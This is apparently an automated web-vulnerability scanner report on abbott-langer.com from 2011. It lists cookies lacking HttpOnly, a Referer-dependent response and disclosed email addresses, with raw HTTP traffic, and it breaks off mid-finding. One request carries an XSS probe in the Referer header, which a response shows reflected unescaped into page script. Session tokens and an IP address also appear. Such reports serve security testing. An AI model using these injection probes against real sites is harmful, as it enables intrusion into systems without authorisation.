Date: Fri, 03 Jun 2011 20:41:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=13832050;expires=Sun, 26-May-2041 20:41:48 GMT;path=/
Set-Cookie: CFTOKEN=d3cc162c5fa63b7e-573D8707-BD3A-3DAC-6285919E0D62C3A0;expires=Sun, 26-May-2041 20:41:48 GMT;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: CFID=13832050;path=/
Set-Cookie: CFTOKEN=d3cc162c5fa63b7e%2D573D8707%2DBD3A%2D3DAC%2D6285919E0D62C3A0;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=13832050%2Dd3cc162c5fa63b7e%2D573D8707%2DBD3A%2D3DAC%2D6285919E0D62C3A0%7C%7C06%2F03%2F2011%2001%3A41%3A48%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...

2.2. http://www.abbott-langer.com/index.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.1.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:49:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A31%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A31%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A31%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E1%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A35%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...

3. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abbott-langer.com
Path:   /index.cfm

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.2.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=; SESSIONCOOKIETEST=testing123; PERSISTENTCOOKIETEST=testing123; __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1; __UTMB=92019530%2E1%2E10%2E1307134120; __UTMC=92019530; __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:51:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E2%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E2%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E2%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E2%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E2%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E2%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A33%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<script language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "", "", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","","http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1","en-us","","","5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8","No","173.193.214.243","No","");</script>
           <noscript>
               <img src="/SiteTracker/index.cfm?FuseAction=SiteTracker.PageHit&TrkIDVar=&IntTrkIDVar=&WebsiteID=16&ReturnImage=Yes&JavaScript=No&UUID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=MAIN&QueryString=&ReferringPage=http://www.abbott-langer.com/?da443%22-alert(%22XSS%22)-%22dacf051550a=1&Language=en-us&Browser=&BrowserVersion=&UserID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&UniqueVistor=No&IPAddress=173.193.214.243&Test=No&Comment=" width="1" height="1" border="0">
           </noscript>
   
<!-- END: Site Tracker Code -->    







































                   
                       
                           <script type="text/javascript">
                               var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
                               document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
                           </script>
                           <script type="text/javascript">
                               var pageTracker = _gat._getTracker("UA-2431044-3");
                               pageTracker._trackPageview();
                           </script>
               
       </body>
       </html>

Request 2

GET /index.cfm HTTP/1.1
Host: www.abbott-langer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: LICENSECODE=; MODE=; CFID=5950531; CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8; STOREID=6; TRKID=; INTTRKID=; USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A49%3A00%20PM; VID=3; SessionCookieTest=testing123; PersistentCookieTest=testing123; __utma=92019530.1461229368.1307134120.1307134120.1307134120.1; __utmb=92019530.2.10.1307134120; __utmc=92019530; __utmz=92019530.1307134120.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; SESSIONID=; SESSIONCOOKIETEST=testing123; PERSISTENTCOOKIETEST=testing123; __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1; __UTMB=92019530%2E1%2E10%2E1307134120; __UTMC=92019530; __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName
Cache-Control: max-age=0

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Jun 2011 20:58:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: LICENSECODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: MODE=;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: TRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: INTTRKID=;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONID=;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: CFID=5950531;path=/
Set-Cookie: CFTOKEN=b7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A51%3A00%20PM;path=/
Set-Cookie: VID=3;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: SESSIONCOOKIETEST=testing123;path=/
Set-Cookie: PERSISTENTCOOKIETEST=testing123;path=/
Set-Cookie: __UTMA=92019530%2E1461229368%2E1307134120%2E1307134120%2E1307134120%2E1;path=/
Set-Cookie: __UTMB=92019530%2E3%2E10%2E1307134120;path=/
Set-Cookie: __UTMC=92019530;path=/
Set-Cookie: __UTMZ=92019530%2E1307134120%2E1%2E1%2Eutmcsr%3Dfakereferrerdominator%2Ecom%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D%2FreferrerPathName;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: STOREID=6;path=/
Set-Cookie: USERTRACKER=5950531%2Db7cfec4fc71d17a6%2D57441F3A%2D0FE1%2D5155%2D8B352BCCD83D2DA8%7C%7C06%2F03%2F2011%2001%3A58%3A23%20PM;path=/
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding, User-Agent

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
       <html xmlns="http://www.w3.org/1999/xhtml">
   
       <head>
       
               <titl
...[SNIP]...
<script language="JavaScript" type="text/javascript">SiteTracker("http://www.abbott-langer.com/", "", "", "16","HTTP://www.abbott-langer.com/index.cfm","HOME","MAIN","","N/A","en-us","","","5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8","No","173.193.214.243","No","");</script>
           <noscript>
               <img src="/SiteTracker/index.cfm?FuseAction=SiteTracker.PageHit&TrkIDVar=&IntTrkIDVar=&WebsiteID=16&ReturnImage=Yes&JavaScript=No&UUID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&CurrentPage=HTTP://www.abbott-langer.com/index.cfm&Circuit=HOME&FuseActionVar=MAIN&QueryString=&ReferringPage=N/A&Language=en-us&Browser=&BrowserVersion=&UserID=5950531-b7cfec4fc71d17a6-57441F3A-0FE1-5155-8B352BCCD83D2DA8&UniqueVistor=No&IPAddress=173.193.214.243&Test=No&Comment=" width="1" height="1" border="0">
           </noscript>
   
<!-- END: Site Tracker Code -->    







































                   
                       
                           <script type="text/javascript">
                               var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
                               document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
                           </script>
                           <script type="text/javascript">
                               var pageTracker = _gat._getTracker("UA-2431044-3");
                               pageTracker._trackPageview();
                           </script>
               
       </body>
       </html>

4. Email addresses disclosed  previous  next
There are 2 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


4.1. http://www.abbott-langer.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.abbott-langer.com
Path:   /

Issue detail
